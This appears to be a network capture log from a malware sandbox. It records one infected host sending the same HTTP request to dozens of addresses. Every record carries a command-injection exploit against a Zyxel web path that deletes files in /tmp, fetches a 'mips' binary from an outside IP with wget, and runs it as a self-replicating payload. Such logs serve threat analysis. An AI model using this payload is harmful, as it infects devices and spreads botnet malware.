                              Mar 31, 2024 08:41:58.221637964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7533192.168.2.133710049.247.214.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221714020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7534192.168.2.134136886.173.149.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221767902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7535192.168.2.1341242119.216.194.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221827030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7536192.168.2.135429032.181.215.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221884966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7537192.168.2.1342888114.105.13.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221956015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7538192.168.2.133630269.76.197.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222008944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7539192.168.2.133947657.8.129.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222054958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7540192.168.2.1349554100.235.156.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222120047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7541192.168.2.1332812218.151.204.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222176075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7542192.168.2.134858034.30.242.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222213984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7543192.168.2.135378485.131.240.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222266912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7544192.168.2.134028863.153.90.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222321033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7545192.168.2.13601508.55.164.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222377062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7546192.168.2.1353954179.220.117.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222448111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7547192.168.2.134044024.37.56.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222510099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7548192.168.2.1352576171.220.27.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222567081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7549192.168.2.1358392142.250.37.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222660065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7550192.168.2.1338938143.87.221.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222723961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7551192.168.2.1355130207.200.191.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222750902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7552192.168.2.1332958205.99.46.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222836018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7553192.168.2.1335902174.136.177.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222882032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7554192.168.2.1344974213.13.184.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.222955942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7555192.168.2.1343814103.167.209.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223040104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7556192.168.2.13432564.54.186.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223079920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7557192.168.2.135630440.139.177.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223165035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7558192.168.2.1333896133.145.17.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223208904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7559192.168.2.1349908153.243.229.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223275900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7560192.168.2.1348362110.202.195.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223325968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7561192.168.2.1338946167.146.94.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223404884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7562192.168.2.1348878186.136.130.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223454952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7563192.168.2.1357756120.74.111.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223500013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7564192.168.2.134381618.209.169.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223575115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7565192.168.2.135819242.193.240.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223637104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7566192.168.2.1336502100.21.95.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223681927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7567192.168.2.1347590140.70.191.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223737001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7568192.168.2.1348726108.11.202.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223799944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7569192.168.2.136046039.200.251.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223864079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7570192.168.2.1339742167.231.91.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223937988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7571192.168.2.1354096201.227.106.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.223983049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7572192.168.2.1354324110.13.175.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224047899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7573192.168.2.133782038.22.116.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224113941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7574192.168.2.1343270144.228.6.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224163055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7575192.168.2.1333030121.60.102.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224232912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7576192.168.2.1342978176.148.79.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224292994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7577192.168.2.1347532168.241.166.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224356890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7578192.168.2.1358718209.111.248.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224406004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7579192.168.2.1342322205.14.149.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224483013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7580192.168.2.135123420.228.159.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224541903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7581192.168.2.1340858135.44.207.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224603891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7582192.168.2.1343596116.100.192.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224684000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7583192.168.2.134112273.57.151.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224735975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7584192.168.2.1342340195.103.17.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224790096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7585192.168.2.1357118106.128.84.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224850893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7586192.168.2.133585444.35.232.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224922895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7587192.168.2.1344402102.22.182.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.224996090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7588192.168.2.1357378213.60.119.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225022078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7589192.168.2.1337208204.240.241.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225074053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7590192.168.2.1337538159.103.219.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225145102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7591192.168.2.1359880141.174.22.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225204945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7592192.168.2.1334234194.230.171.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225267887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7593192.168.2.1337482190.23.118.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225331068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7594192.168.2.1337050116.203.73.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225405931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7595192.168.2.1338918116.41.183.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225466967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7596192.168.2.134804242.91.108.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225529909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7597192.168.2.1347482115.191.44.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225598097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7598192.168.2.1354460153.108.191.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225660086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7599192.168.2.1348070153.180.175.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225733995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7600192.168.2.134482476.121.121.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225807905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7601192.168.2.133892425.44.148.189443
                              TimestampBytes transferredDirectionData
